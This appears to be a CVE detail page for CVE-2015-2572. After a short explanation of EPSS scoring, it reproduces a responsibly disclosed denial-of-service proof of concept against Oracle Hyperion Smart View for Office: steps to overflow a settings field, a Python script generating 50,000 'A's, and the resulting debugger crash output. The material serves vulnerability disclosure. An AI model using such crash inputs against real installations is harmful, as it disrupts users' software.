CVE-2015-2572 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

# Exploit Title: Buffer Overflow in Oracle� Hyperion Smart View for Office [DOS] # Exploit Author: sajith # Vendor Homepage: http://oracle.com # vulnerable Version: Fusion Edition 11.1.2.3.000 Build 157 #Vulnerable Link: http://www.oracle.com/technetwork/middleware/smart-view-for-office/downloads/index.html # Tested in: Microsoft Windows 7 Enterprise 6.1.7601 Service Pack 1 [x64],en-us #plugin tested with Microsoft Excel 2010 #CVE: CVE-2015-2572 Responsible Disclosure: Reported to Oracle on Jul 7, 2014 patch released on April 14, 2015 How to reproduce the bug? 1)install "Smart view" and open Microsoft excel and click on "smart view" tab 2)click on "Options" and then click on "Advanced" tab 3) In General menu in "shared Connections URL" enter large value say 50000 "A"'s and press ok, the application crashes, the output of the crash analyzed in debugger is shown below Note:Plugin once installed automatically integrates with Microsoft office products like,excel,Word,PowerPoint,Microsoft office.so the vulnerability can be exploited via any of these products. ==================python script to create 50000 "A"'s============ try: print "POC by sajith shetty" f = open("text.txt","w") junk = "A" * 50000 f.write(junk) print "done" except Exception, e: print "error- " + str(e) Debugger o/p: eax=00410061 ebx=0041005d ecx=00410041 edx=00000000 esi=00410061 edi=0041005d eip=779622d2 esp=0040b7f8 ebp=0040b80c iopl=0 nv up ei pl nz na pe nc cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206 ntdll!RtlEnterCriticalSection+0x12: 779622d2 f00fba3000 lock btr dword ptr [eax],0 ds:002b:00410061=???????? caused by MODULE_NAME: HsAddin start end module name 0fb50000 111a0000 HsAddin (export symbols) C:\Oracle\SmartView\bin\HsAddin.dll Loaded symbol image file: C:\Oracle\SmartView\bin\HsAddin.dll Image path: C:\Oracle\SmartView\bin\HsAddin.dll Image name: HsAddin.dll Timestamp: Wed Mar 27 04:27:50 2013 (515227EE) CheckSum: 0163F951 ImageSize: 01650000 File version: 11.1.2.3085 Product version: 11.1.2.3085 File flags: 0 (Mask 3F) File OS: 4 Unknown Win32 File type: 2.0 Dll File date: 00000000.00000000 Translations: 0409.04b0 CompanyName: Oracle Corporation ProductName: Oracle� Hyperion Smart View for Office, Fusion Edition InternalName: CommonAddin ProductVersion: 11.1.2.3.000.157 FileVersion: 11.1.2.3085 FileDescription: Oracle� Hyperion Smart View for Office, Fusion Edition LegalCopyright: Copyright 2004, 2013 Oracle Corporation. All rights reserved LegalTrademarks: Oracle� is registered.